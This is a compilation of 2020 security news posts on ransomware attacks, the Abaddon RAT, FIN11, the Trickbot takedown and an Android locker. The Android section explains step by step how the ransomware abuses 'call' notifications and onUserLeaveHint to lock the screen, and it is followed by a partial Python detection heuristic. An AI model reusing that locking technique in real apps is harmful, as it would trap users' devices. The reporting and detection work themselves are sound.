The media pointed out that this is the first reported case of a ransomware attack against a system used in the upcoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections: they could disrupt voting systems and raise doubts about the validity of the vote.

The attack took place on October 7; it hit Hall County, in the northern part of the state, and disabled the county’s voter signature database.

“One of the databases the county uses to verify voter signatures on absentee ballots is not working after some county network outages due to a ransomware attack on Oct. 7.” reported the Gainesville Times. “Registration Coordinator Kay Wimpye with the county elections office said employees can still verify voter signatures by manually pulling hard copies of voter registration cards, which is more time-consuming. Most voter signatures can be verified using a state database that has been unaffected by the outages, she said.”

The media reported that the Hall County attack was carried out by Doppelpaymer ransomware operators that also leaked stolen data on their dark web leak site to force the organization to pay the ransom.

The county website published an update announcing that the attack did not impact the voting process for citizens, a situation that differs from the scenario reported by the Times.

Pierluigi Paganini

(SecurityAffairs – hacking, Georgia county)

The post Ransomware attack disabled Georgia County Election database appeared first on Security Affairs.

Is the Abaddon RAT the first malware using Discord as C&C?

Abaddon is the first RAT that uses the freeware instant messaging and VoIP app and digital distribution platform Discord as a command & control server.

Researchers from MalwareHunterTeam have spotted a new piece of remote access trojan (RAT) dubbed ‘Abaddon’ that is likely the first malware using the Discord platform as command and control. The Abaddon malware connects to the Discord command and control server to check for new commands to execute.

Experts also warn that the author of the malware is developing a ransomware feature.

In the past, other threat actors already abused the Discord platform for different purposes, such as using it as a stolen data drop.

“In the past, we have reported on how threat actors use Discord as a stolen data drop or have created malware that modifies the Discord client to have it steal credentials and other information.” reported Bleeping Computer that first reported the news.

Abaddon implements a data-stealing feature: it was designed to steal multiple kinds of data from the infected host, including Chrome cookies, saved credit cards and credentials, Steam credentials, Discord tokens, and MFA information.

The malware also collects system information such as country, IP address, and hardware information.

According to Bleeping Computer the malware supports the following commands:

  • Steal a file or entire directories from the computer
  • Get a list of drives
  • Open a reverse shell that allows the attacker to execute commands on the infected PC.
  • Launch in-development ransomware (more later on this).
  • Send back any collected information and clear the existing collection of data.

The malicious code connects to the Command & Control every ten seconds for new tasks to execute.

Experts pointed out that the malware also implements commands to encrypt files on the infected system and to decrypt them.

The ransomware feature appears to be under development.

Pierluigi Paganini

(SecurityAffairs – hacking, Abaddon)

The post Is the Abaddon RAT the first malware using Discord as C&C? appeared first on Security Affairs.

Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware

The systems at the US-based ski and golf resort operator were infected with the WastedLocker ransomware, the incident impacted reservation systems.

Boyne Resorts is a collection of mountain and lakeside resorts, ski areas, and attractions spanning from British Columbia to Maine. The company owns and operates eleven properties and an outdoor lifestyle equipment/apparel retail division with stores in cities throughout Michigan. An industry leader in multiple U.S. regions, operations include snowsports and year-round mountain recreation, golf, an indoor waterpark, spas, food and beverage, lodging and real estate development.

Boyne Resorts was the victim of a WastedLocker ransomware attack; the incident impacted its reservation systems.

According to BleepingComputer, the ransomware operators initially breached the corporate offices and then moved laterally, targeting the IT systems of the resorts the company operates. As a result of the attack, the company was forced to shut down portions of its network to prevent the ransomware from spreading.

Customers of the company were not able to make reservations at the resorts it operates.

The ransomware encrypted files and renamed them by appending the “.easy2lock” extension, which was previously associated with recent WastedLocker infections.

In July, smartwatch and wearable device maker Garmin had to shut down some of its connected services and call centers following a WastedLocker ransomware attack.

In June, security experts from Symantec reported that at least 31 organizations in the United States had been targeted with the recently discovered WastedLocker ransomware.

Researchers from NCC Group, and later Symantec, confirmed that the malware was developed by the Russian cybercrime crew known as Evil Corp, which was behind the Dridex Trojan and multiple ransomware families including Locky, Bart, Jaff, and BitPaymer.

Most of the victims belong to the manufacturing industry, followed by IT and media and telecommunications sectors.

The group has been active since at least 2007. In December 2019, the U.S. Treasury Department imposed sanctions on Evil Corp for causing more than $100 million in financial damages.

The U.S. Department of Justice (DoJ) has charged Russian citizens Maksim V. (32) and Igor Turashev (38) for distributing the infamous Dridex banking Trojan, and for their involvement in international bank fraud and computer hacking schemes.

Ransom payments to WastedLocker are not allowed by US authorities; this means that Boyne Resorts could face severe sanctions if it pays the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, WastedLocker)

The post Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware appeared first on Security Affairs.

Sopra Steria hit by the Ryuk ransomware gang

French IT outsourcer Sopra Steria hit by ‘cyberattack’, Ryuk ransomware suspected

French IT outsourcer Sopra Steria has been hit by a ransomware attack. While the company did not reveal the family of malware that infected its systems, local media speculate that the Ryuk ransomware was involved.

“A cyber attack was detected on the Sopra Steria computer network on the evening of October 20. Security measures have been taken to limit the risk of propagation.” reads the press release published by the company. “The Group’s teams are fully mobilized to ensure a return to normal as quickly as possible and everything is done to ensure business continuity. Sopra Steria is in close contact with its customers and partners as well as with the competent authorities.”

The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

“According to our sources, the incident started to spread during the course of last night. The Active Directory infrastructure would be affected. And part of the information system would have been encrypted.” reported the website LeMagit. “Two sources tell us that the ransomware involved is none other than Ryuk. Surprise, researcher JamesWT_MHT found on VirusTotal a copy of an executable which two sources have confirmed to us is used internally at ESN for the generation of email signatures.”

French authorities are investigating the incident.

Sopra Steria is a member of France’s Cyber Campus, a French initiative to spread cybersecurity awareness, training, and product sales.

The Ryuk ransomware operators were very active early this year; in March they targeted hospitals even as these organizations were involved in the fight against the Coronavirus pandemic.

In September, healthcare provider Universal Health Services (UHS) reportedly shut down systems at its healthcare facilities after a Ryuk ransomware attack.

In March, the City of Durham shut down its network after a Ryuk ransomware attack.

A few days before, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, was hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Pierluigi Paganini

(SecurityAffairs – hacking, Sopra Steria)

The post Sopra Steria hit by the Ryuk ransomware gang appeared first on Security Affairs.

Sopra Steria hit by cyber attack. IT services group suspected of falling victim to ransomware

European IT services group Sopra Steria has been hit by a cyber attack. Which would be unfortunate for any business at the best of times, but is possibly even more galling for a firm like Sopra Steria which has a specialist cybersecurity branch which claims to help customers “protect sensitive information, and prevent costly data breaches.”

Exploring the prolific threats influencing the cyber landscape

Some of the world’s most skilled nation-state cyber adversaries and notorious ransomware gangs are deploying an arsenal of new open-sourced tools, actively exploiting corporate email systems and using online extortion to scare victims into paying ransoms, according to a report from Accenture. The report examines the tactics, techniques and procedures employed by some of the most sophisticated cyber adversaries and explores how cyber incidents could evolve over the next year. “Since COVID-19 radically shifted the … More

The post Exploring the prolific threats influencing the cyber landscape appeared first on Help Net Security.

How tech trends and risks shape organizations’ data protection strategy

Trustwave released a report which depicts how technology trends, compromise risks and regulations are shaping how organizations’ data is stored and protected. Data protection strategy The report is based on a recent survey of 966 full-time IT professionals who are cybersecurity decision makers or security influencers within their organizations. Over 75% of respondents work in organizations with over 500 employees in key geographic regions including the U.S., U.K., Australia and Singapore. “Data drives the global … More

The post How tech trends and risks shape organizations’ data protection strategy appeared first on Help Net Security.

Smashing Security podcast #201: Robin Hood, Flippy, and the web ad bubble

The Darkside ransomware gang thinks it's a modern-day Robin Hood when it donates extorted Bitcoins to charity, the micro-targeted ad industry could pop like a bubble, and would you trust a burger-flipping robot? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Tim Hwang.

Montréal Public Transport Agency Discloses Ransomware Attack

A public transport agency operating in Montréal announced that a ransomware attack had affected its website and other systems. The Société de transport de Montréal (STM) disclosed the infection on a web page it created to keep customers updated about its services while its main site remains offline: Since the afternoon of October 19, the […]… Read More

The post Montréal Public Transport Agency Discloses Ransomware Attack appeared first on The State of Security.

Ransomware Gang Donated Part of Ransom Demands to Charities

A budding ransomware group donated part of the ransom demands that it had previously extorted from its victims to two charities. On October 13, the Darkside ransomware group announced the donations in a blog post on its dark web portal. As quoted by ZDNet: As we said in the first press release – we are […]… Read More

The post Ransomware Gang Donated Part of Ransom Demands to Charities appeared first on The State of Security.

Nefilim ransomware gang published Luxottica data on its leak site

The Nefilim ransomware operators have posted a long list of files that appear to belong to Italian eyewear and eyecare giant Luxottica.

Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch.

Luxottica employs over 80,000 people and generated 9.4 billion in revenue for 2019.

On September 18, the company was hit by a cyberattack; some of the web sites operated by the company were not reachable, including Ray-Ban, Sunglass Hut, LensCrafters, EyeMed, and Pearle Vision.

Italian media outlets reported that the operations at the plants of Luxottica in Agordo and Sedico (Italy) were disrupted due to a computer system failure. Union sources confirmed that the personnel at the plants received an SMS in which they were notified that “the second workshift of today 21 September is suspended” due to “serious IT problems”.

The BleepingComputer website, citing the security firm Bad Packets, speculated that the Italian company was using a Citrix ADC controller device vulnerable to the critical CVE-2019-19781 vulnerability in Citrix devices.

At the time, Luxottica had yet to release any official statement on the attack.

Security experts believe that the threat actor exploited the above flaw to infect the company’s systems with ransomware.

Now we have more information about the incident, which appears to have been the result of a ransomware attack.

The popular Italian cyber security expert Odysseus first revealed on the web site “Difesa e Sicurezza” that the Nefilim ransomware operators have posted a long list of files that appear to belong to Luxottica.

The huge trove of files appears to be related to the personnel office and finance departments.


The analysis of the leaked files revealed that they contain confidential information regarding the recruitment process, professional resumes, and info about the internal structures of the Group’s human resource department.

The exposed financial data includes budgets, marketing forecast analysis, and other sensitive data.

Nefilim ransomware operators also published a message which accuses Luxottica of having failed to properly manage the attack.

In the past months, the number of ransomware attacks surged: numerous ransomware gangs made the headlines targeting organizations worldwide and threatening to release the stolen data if the ransom was not paid.

“Extortion is the “new deal” of cybercrime: now, more than in the past, companies can’t “hide” the cyber attack anymore. Now it becomes mandatory to “manage” the breach from the communication perspective: dissembling is useless and harmful.” explained Odysseus. “And again, defending companies from cyber attacks becomes even more strategic: data leak damages can generate a tremendous amount of costs for companies worldwide.”

One of the crews that adopted this double-extortion model is the Nefilim ransomware gang, which targeted several organizations including the mobile network operator Orange, the independent European leader in multi-technical services The SPIE Group, and Germany’s largest private multi-service provider, the Dussmann Group.

Pierluigi Paganini

(SecurityAffairs – hacking, Luxottica)

The post Nefilim ransomware gang published Luxottica data on its leak site appeared first on Security Affairs.

A Closer Look at the Attempted Ransomware Attack on Tesla

Cybersecurity is in the news again with the disclosure that Tesla, working in conjunction with the FBI, prevented a ransomware attack from being launched at its Gigafactory in Nevada. The cybercriminals targeted Tesla through one of its employees, whom they allegedly promised to pay $1 million in order to help them infect the company’s system […]… Read More

The post A Closer Look at the Attempted Ransomware Attack on Tesla appeared first on The State of Security.

FIN11 gang started deploying ransomware to monetize its operations

The financially-motivated hacker group FIN11 has started spreading ransomware to monetize its cyber criminal activities.

The financially-motivated hacker group FIN11 has switched tactics, starting to use ransomware as its main monetization method.

The group carried out multiple high-volume operations targeting companies across the world, most of them in North America and Europe.

In recent attacks, the group was observed deploying the Clop ransomware into the networks of its victims.

Since August, FIN11 started targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation.

Researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages distributing a malware downloader dubbed FRIENDSPEAK.

“Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands.” reads the analysis published by FireEye. “The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.”

The attack chain starts when the victims enable the macro embedded in an Excel spreadsheet that came with the phishing e-mails.

The macros download and execute the FRIENDSPEAK code, which in turn downloads the MIXLABEL malware.

Experts also reported that the threat actor modified the macros in Office documents used as bait and also added geofencing techniques.

Mandiant researchers highlighted an important overlap with operations conducted by the TA505 cybercrime gang (aka Evil Corp), which has been active since 2014 focusing on the retail and banking sectors.

TA505 also deployed the Clop ransomware in its malware campaigns and recently started exploiting the ZeroLogon critical flaw to compromise targeted organizations.

“Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware.” reads the analysis. “Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.”


The experts pointed out that the FIN11 actors did not necessarily abandon a target after dropping the Clop ransomware and losing access: in at least one case they re-compromised the target organization a few months later.

The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries).

The experts observed Russian-language file metadata in the code of the malware and reported that the Clop ransomware was only deployed on machines with a keyboard layout used outside CIS countries.

Mandiant researchers speculate that FIN11 will continue to target organizations with sensitive proprietary data that will likely pay the ransom to recover their operations after the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, FIN11)

The post FIN11 gang started deploying ransomware to monetize its operations appeared first on Security Affairs.

Barnes & Noble warns customers it has been hacked, customer data may have been accessed

American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday October […]… Read More

The post Barnes & Noble warns customers it has been hacked, customer data may have been accessed appeared first on The State of Security.

FIN11: Widespread Email Campaigns as Precursor for Ransomware and Data Theft

Mandiant Threat Intelligence recently promoted a threat cluster to a named FIN (or financially motivated) threat group for the first time since 2017. We have detailed FIN11's various tactics, techniques and procedures in a report that is available now by signing up for Mandiant Advantage Free.

In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity. There are significant gaps in FIN11’s phishing operations, but when active, the group conducts up to five high-volume campaigns a week. While many financially motivated threat groups are short lived, FIN11 has been conducting these widespread phishing campaigns since at least 2016. From 2017 through 2018, the threat group primarily targeted organizations in the financial, retail, and hospitality sectors. However, in 2019 FIN11’s targeting expanded to include a diverse set of sectors and geographic regions. At this point, it would be difficult to name a client that FIN11 hasn’t targeted.

Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion.

Notably, FIN11 includes a subset of the activity security researchers call TA505, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

To learn more about FIN11’s evolving delivery tactics, use of services, post-compromise TTPs, and monetization methods, register for Mandiant Advantage Free. The full FIN11 report is also available through our FireEye Intelligence Portal (FIP). Then for even more information, register for our exclusive webinar on Oct. 29 where Mandiant threat intelligence experts will take a deeper dive into FIN11, including its origins, tactics, and potential for future activity. 

Microsoft Uses Trademark Law to Disrupt Trickbot Botnet

Microsoft Corp. has executed a coordinated legal sneak attack in a bid to disrupt the malware-as-a-service botnet Trickbot, a global menace that has infected millions of computers and is used to spread ransomware. A court in Virginia granted Microsoft control over many Internet servers Trickbot uses to plunder infected systems, based on novel claims that the crime machine abused the software giant’s trademarks. However, it appears the operation has not completely disabled the botnet.

A spam email containing a Trickbot-infected attachment that was sent earlier this year. Image: Microsoft.

“We disrupted Trickbot through a court order we obtained as well as technical action we executed in partnership with telecommunications providers around the world,” wrote Tom Burt, corporate vice president of customer security and trust at Microsoft, in a blog post this morning about the legal maneuver. “We have now cut off key infrastructure so those operating Trickbot will no longer be able to initiate new infections or activate ransomware already dropped into computer systems.”

Microsoft’s action comes just days after the U.S. military’s Cyber Command carried out its own attack that sent all infected Trickbot systems a command telling them to disconnect themselves from the Internet servers the Trickbot overlords used to control them. The roughly 10-day operation by Cyber Command also stuffed millions of bogus records about new victims into the Trickbot database in a bid to confuse the botnet’s operators.

In legal filings, Microsoft argued that Trickbot irreparably harms the company “by damaging its reputation, brands, and customer goodwill. Defendants physically alter and corrupt Microsoft products such as the Microsoft Windows products. Once infected, altered and controlled by Trickbot, the Windows operating system ceases to operate normally and becomes tools for Defendants to conduct their theft.”

From the civil complaint Microsoft filed on October 6 with the U.S. District Court for the Eastern District of Virginia:

“However, they still bear the Microsoft and Windows trademarks. This is obviously meant to and does mislead Microsoft’s customers, and it causes extreme damage to Microsoft’s brands and trademarks.”

“Users subject to the negative effects of these malicious applications incorrectly believe that Microsoft and Windows are the source of their computing device problems. There is great risk that users may attribute this problem to Microsoft and associate these problems with Microsoft’s Windows products, thereby diluting and tarnishing the value of the Microsoft and Windows trademarks and brands.”

Microsoft said it will leverage the seized Trickbot servers to identify and assist Windows users impacted by the Trickbot malware in cleaning the malware off of their systems.

Trickbot has been used to steal passwords from millions of infected computers, and reportedly to hijack access to well more than 250 million email accounts from which new copies of the malware are sent to the victim’s contacts.

Trickbot’s malware-as-a-service feature has made it a reliable vehicle for deploying various strains of ransomware, locking up infected systems on a corporate network unless and until the company agrees to make an extortion payment.

A particularly destructive ransomware strain that is closely associated with Trickbot — known as “Ryuk” or “Conti” — has been responsible for costly attacks on countless organizations over the past year, including healthcare providers, medical research centers and hospitals.

One recent Ryuk victim is Universal Health Services (UHS), a Fortune 500 hospital and healthcare services provider that operates more than 400 facilities in the U.S. and U.K.

On Sunday, Sept. 27, UHS shut down its computer systems at healthcare facilities across the United States in a bid to stop the spread of the malware. The disruption caused some of the affected hospitals to redirect ambulances and relocate patients in need of surgery to other nearby hospitals.

Microsoft said it did not expect its action to permanently disrupt Trickbot, noting that the crooks behind the botnet will likely make efforts to revive their operations. But so far it’s not clear whether Microsoft succeeded in commandeering all of Trickbot’s control servers, or when exactly the coordinated seizure of those servers occurred.

As the company noted in its legal filings, the set of Internet addresses used as Trickbot controllers is dynamic, making attempts to disable the botnet more challenging.

Indeed, according to real-time information posted by Feodo Tracker, a Swiss security site that tracks Internet servers used as controllers for Trickbot and other botnets, nearly two dozen Trickbot control servers — some of which first went active at the beginning of this month — are still live and responding to requests at the time of this publication.

Trickbot control servers that are currently online. Source: Feodotracker.abuse.ch

Cyber intelligence firm Intel 471 says fully taking down Trickbot would require an unprecedented level of collaboration among parties and countries that most likely would not cooperate anyway. That’s partly because Trickbot’s primary command and control mechanism supports communication over The Onion Router (TOR) — a distributed anonymity service that is wholly separate from the regular Internet.

“As a result, it is highly likely a takedown of the Trickbot infrastructure would have little medium- to long-term impact on the operation of Trickbot,” Intel 471 wrote in an analysis of Microsoft’s action.

What’s more, Trickbot has a fallback communications method that uses a decentralized domain name system called EmerDNS, which allows people to create and use domains that cannot be altered, revoked or suspended by any authority. The highly popular cybercrime store Joker’s Stash — which sells millions of stolen credit cards — also uses this setup.

From the Intel 471 report [malicious links and IP address defanged with brackets]:

“In the event all Trickbot infrastructure is taken down, the cybercriminals behind Trickbot will need to rebuild their servers and change their EmerDNS domain to point at their new servers. Compromised systems then should be able to connect to the new Trickbot infrastructure. Trickbot’s EmerDNS fall-back domain safetrust[.]bazar recently resolved to the IP address 195.123.237[.]156. Not coincidentally, this network neighborhood also hosts Bazar malware control servers.”

“Researchers previously attributed the development of the Bazar malware family to the same group behind Trickbot, due to code similarities with the Anchor malware family and its methods of operation, such as shared infrastructure between Anchor and Bazar. On Oct. 12, 2020 the fall-back domain resolved to the IP address 23.92.93[.]233, which was confirmed by Intel 471 Malware Intelligence systems to be a Trickbot controller URL in May 2019. This suggests the fall-back domain is still controlled by the Trickbot operators at the time of this report.”

Intel 471 concluded that the Microsoft action has so far done little to disrupt the botnet’s activity.

“At the time of this report, Intel 471 has not seen any significant impact on Trickbot’s infrastructure and ability to communicate with Trickbot-infected systems,” the company wrote.

The legal filings from Microsoft are available here.

Update, 9:51 a.m. ET: Feodo Tracker now lists just six Trickbot controllers as responding. All six were first seen online in the past 48 hours. Also added perspective from Intel 471.

Report: U.S. Cyber Command Behind Trickbot Tricks

A week ago, KrebsOnSecurity broke the news that someone was attempting to disrupt the Trickbot botnet, a malware crime machine that has infected millions of computers and is often used to spread ransomware. A new report Friday says the coordinated attack was part of an operation carried out by the U.S. military’s Cyber Command.


On October 2, KrebsOnSecurity reported that twice in the preceding ten days, an unknown entity that had inside access to the Trickbot botnet sent all infected systems a command telling them to disconnect themselves from the Internet servers the Trickbot overlords used to control compromised Microsoft Windows computers.

On top of that, someone had stuffed millions of bogus records about new victims into the Trickbot database — apparently to confuse or stymie the botnet’s operators.

In a story published Oct. 9, The Washington Post reported that four U.S. officials who spoke on condition of anonymity said the Trickbot disruption was the work of U.S. Cyber Command, a branch of the Department of Defense headed by the director of the National Security Agency (NSA).

The Post report suggested the action was a bid to prevent Trickbot from being used to somehow interfere with the upcoming presidential election, noting that Cyber Command was instrumental in disrupting the Internet access of Russian online troll farms during the 2018 midterm elections.

The Post said U.S. officials recognized their operation would not permanently dismantle Trickbot, describing it rather as “one way to distract them for at least a while as they seek to restore their operations.”

Alex Holden, chief information security officer and president of Milwaukee-based Hold Security, has been monitoring Trickbot activity before and after the 10-day operation. Holden said while the attack on Trickbot appears to have cut its operators off from a large number of victim computers, the bad guys still have passwords, financial data and reams of other sensitive information stolen from more than 2.7 million systems around the world.

Holden said the Trickbot operators have begun rebuilding their botnet, and continue to engage in deploying ransomware at new targets.

“They are running normally and their ransomware operations are pretty much back in full swing,” Holden said. “They are not slowing down because they still have a great deal of stolen data.”

Holden added that since news of the disruption first broke a week ago, the Russian-speaking cybercriminals behind Trickbot have been discussing how to recoup their losses, and have been toying with the idea of massively increasing the amount of money demanded from future ransomware victims.

“There is a conversation happening in the back channels,” Holden said. “Normally, they will ask for [a ransom amount] that is something like 10 percent of the victim company’s annual revenues. Now, some of the guys involved are talking about increasing that to 100 percent or 150 percent.”

Cyber News Rundown: COVID-related Attacks Target Canadian Companies


New Jersey Hospital Pays Massive Ransom

Officials have decided to pay roughly $670,000 in ransom following a ransomware attack on the University Hospital in New Jersey. The hospital was likely forced into this decision after being unable to restore from backups the 240GB of data stolen in the attack on their systems. It’s not entirely clear what information was stolen, but given the haste of payment it was likely highly sensitive patient data.

COVID-Related Cyberattacks Target Canadian Companies

A recent survey revealed that over 25% of all Canadian business organizations had been targeted by a COVID-19-themed cyberattack since the beginning of the year. Most of the organizations surveyed also reported seeing a significant rise in overall cyberattacks since the pandemic began. Worrisome findings also revealed that 38% of organizations surveyed were unsure if they had fallen victim to any type of cyberattack, which could mean the amount of customer information for sale on black markets could be significantly higher.

Boom! Mobile Website Compromised

Customer data has been compromised for users of the Boom! Mobile website, which was infiltrated by malicious JavaScript. It’s still unclear how the unauthorized code got onto the site or how long it was active. Officials for the mobile company have confirmed they do not store payment card data and that no Boom! Mobile accounts were compromised.

Major Ransomware Attacks Increase Through Q3

Researchers have reported a massive increase in ransomware attacks in Q3 of 2020, with the Maze group being responsible for 12% of all attacks. They also reported that Ryuk ransomware variants were responsible for an average of 20 attacks per week. With the ongoing neglect of cybersecurity in major corporations, ransomware attacks will likely continue as long as their authors find them profitable.

Chicago Food Delivery Service Stricken with Data Breach

Nearly 800,000 customer records were compromised following a data breach at ChowBus, a Chicago-based food delivery service. With roughly 440,000 unique email addresses exposed, many individuals are now more susceptible to additional phishing attacks or identity theft. Fortunately, however, ChowBus does not store payment card information on its site.

The post Cyber News Rundown: COVID-related Attacks Target Canadian Companies appeared first on Webroot Blog.

Android Locker Variant Uses Innovative Sequence to Load Ransom Note

A new variant of a sophisticated Android locker family used an innovative sequence to load its ransom note on infected devices. On October 8, Microsoft Defender Research Team revealed that it had spotted a new Android locker variant using novel techniques to display its ransom note to its victims. This threat specifically targeted two components […]… Read More

The post Android Locker Variant Uses Innovative Sequence to Load Ransom Note appeared first on The State of Security.

Sophisticated new Android malware marks the latest evolution of mobile ransomware

Attackers are persistent and motivated to continuously evolve – and no platform is immune. That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows. The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection) now delivers protection on all major platforms.

Microsoft’s mobile threat defense capabilities further enrich the visibility that organizations have on threats in their networks, as well as provide more tools to detect and respond to threats across domains and across platforms. Like all of Microsoft’s security solutions, these new capabilities are likewise backed by a global network of threat researchers and security experts whose deep understanding of the threat landscape guide the continuous innovation of security features and ensure that customers are protected from ever-evolving threats.

For example, we found a particularly sophisticated piece of Android ransomware with novel techniques and behavior, exemplifying the rapid evolution of mobile threats that we have also observed on other platforms. The mobile ransomware, detected by Microsoft Defender for Endpoint as AndroidOS/MalLocker.B, is the latest variant of a ransomware family that’s been in the wild for a while but has been evolving non-stop. This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures, including masquerading as popular apps, cracked games, or video players. The new variant caught our attention because it’s an advanced malware with unmistakable malicious characteristics and behavior, and yet it manages to evade many available protections, registering a low detection rate against security solutions.

As with most Android ransomware, this new threat doesn’t actually block access to files by encrypting them. Instead, it blocks access to devices by displaying a screen that appears over every other window, such that the user can’t do anything else. The said screen is the ransom note, which contains threats and instructions to pay the ransom.

Screenshot of mobile ransom note in Russian language

Figure 1. Sample ransom note used by older ransomware variants

What’s innovative about this ransomware is how it displays its ransom note. In this blog, we’ll detail the innovative ways in which this ransomware surfaces its ransom note using Android features we haven’t seen leveraged by malware before, as well as incorporating an open-source machine learning module designed for context-aware cropping of its ransom note.

New scheme, same goal

In the past, Android ransomware used a special permission called “SYSTEM_ALERT_WINDOW” to display their ransom note. Apps that have this permission can draw a window that belongs to the system group and can’t be dismissed. No matter what button is pressed, the window stays on top of all other windows. This window type was intended to be used for system alerts or errors, but Android threats misused it to force the attacker-controlled UI to fully occupy the screen, blocking access to the device. Attackers create this scenario to persuade users to pay the ransom so they can gain back access to the device.

To catch these threats, security solutions used heuristics that focused on detecting this behavior. Google later implemented platform-level changes that practically eliminated this attack surface. These changes include:

  1. Removing the SYSTEM_ALERT_WINDOW error and alert window types, and introducing a few other types as replacement
  2. Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “above dangerous” category, which means that users have to go through many screens to approve apps that ask for permission, instead of just one click
  3. Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window

To adapt, Android malware evolved to misusing other features, but these aren’t as effective. For example, some strains of ransomware abuse accessibility features, a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services. Other ransomware families use infinite loops of drawing non-system windows, but in between drawing and redrawing, it’s possible for users to go to settings and uninstall the offending app.

The new Android ransomware variant overcomes these barriers by evolving further than any Android malware we’ve seen before. To surface its ransom note, it uses a series of techniques that take advantage of the following components on Android:

  1. The “call” notification, among several categories of notifications that Android supports, which requires immediate user attention.
  2. The “onUserLeaveHint()” callback method of the Android Activity (i.e., the typical GUI screen the user sees) is called as part of the activity lifecycle when the activity is about to go into the background as a result of user choice, for example, when the user presses the Home key.

The malware connects the dots and uses these two components to create a special type of notification that triggers the ransom screen via the callback.

Figure 2. The notification with full intent and set as “call” category

As the code snippet shows, the malware creates a notification builder and then does the following:

  1. setCategory(“call”) – This means that the notification is built as a very important notification that needs special privilege.
  2. setFullScreenIntent() – This API wires the notification to a GUI so that it pops up when the user taps on it. At this stage, half the job is done for the malware. However, the malware wouldn’t want to depend on user interaction to trigger the ransomware screen, so it adds another Android callback:

Figure 3. The malware overriding onUserLeaveHint

As the code snippet shows, the malware overrides the onUserLeaveHint() callback function of the Activity class. The function onUserLeaveHint() is called whenever the malware screen is pushed to the background, causing the in-call Activity to be automatically brought to the foreground. Recall that the malware hooked the RansomActivity intent with the notification that was created as a “call” type notification. This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraws or posing as a system window.
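The two halves of that chain are each legitimate on their own (a dialer or VoIP app uses a “call” notification with a full-screen intent, and many activities override onUserLeaveHint()), so a useful static heuristic is to flag only their combination. The following is an added example, not Microsoft’s or the malware’s code: it scans decompiled Java source text, held as a dict of class name to source, for a CATEGORY_CALL notification with setFullScreenIntent() plus an onUserLeaveHint() override whose body relaunches an Activity or re-posts a notification. All class names and sources are constructed for the demo.

```python
"""Static heuristic for the notification/callback screen-lock chain.

Constructed example. Finds (a) a "call" category notification that also sets a
full-screen intent and (b) an onUserLeaveHint() override whose body relaunches an
Activity or re-posts a notification. Only (a) and (b) together yield the
"screen-lock-chain" finding; either alone is normal for a dialer or VoIP app.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

CALL_CATEGORY = re.compile(
    r'setCategory\(\s*(?:"call"|(?:NotificationCompat|Notification)\.CATEGORY_CALL)\s*\)')
FULL_SCREEN_INTENT = re.compile(r'\.setFullScreenIntent\(')
# Calls that bring a UI back to the foreground from inside the callback.
RELAUNCH = re.compile(r'\bstartActivity\(|\.notify\(|\.send\(')


@dataclass
class Finding:
    rule: str
    cls: str
    evidence: str


def method_body(src: str, name: str) -> Optional[str]:
    """Return the body of the first method named `name`, found by brace matching."""
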